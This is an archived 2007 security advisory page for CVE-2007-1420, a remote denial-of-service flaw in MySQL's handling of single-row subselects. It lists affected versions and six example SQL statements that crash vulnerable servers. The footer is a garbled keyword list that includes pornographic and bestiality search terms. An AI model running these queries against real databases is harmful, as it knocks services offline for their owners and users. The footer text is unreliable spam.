about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MySQL Single Row SubSelect Remote Denial Of Service Vulnerability


Title MySQL Single Row SubSelect Remote Denial Of Service Vulnerability
Published 2007-03-09-12:00AM
Updated 2008-05-21-06:24PM
Class Failure to Handle Exceptional Conditions
CVE   CVE-2007-1420
Remote  Yes
Local  No
Credit  S.Streichsbier and B.Mueller of SEC-CONSULT are credited with the discovery of this vulnerability.
Vulnerable  Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
rPath rPath Linux 1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux 5 server
Pardus Linux 2007.1
MySQL AB MySQL 5.0.33
MySQL AB MySQL 5.0.27
MySQL AB MySQL 5.0
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Gentoo Linux
Not Vulnerable  MySQL AB MySQL 5.0.37
MySQL AB MySQL 5.0.36
Code  The following example exploit statements are available:SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 23:07:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.gatas. CMS is Fre Www tamilh PHP memory sania mirz Apache 2.2 Sexyboom.c CMS is Fre Sex photo film x -18 Www.tw.com cat /error Sex video My_eGaller Fack photo CMS is Fre Free hardc NICOLAUIE ip+board+2 news for C www.89.cm. charlie PHP+Advanc Sexygirl.c My_eGaller shat sex a Adulsex indian xxx www.xNxx.c indian xxx Zooporn indian xxx 200 /compo WWW XNXXCO Zooporn Adulsex NET CAFE S PHP+Advanc remote roo 200 /compo shat sex a elf.cz www.sextvi www.sex mo hairy puss www.sextvi Www.sex.tv Apache h pinchunter IMEGE GIRL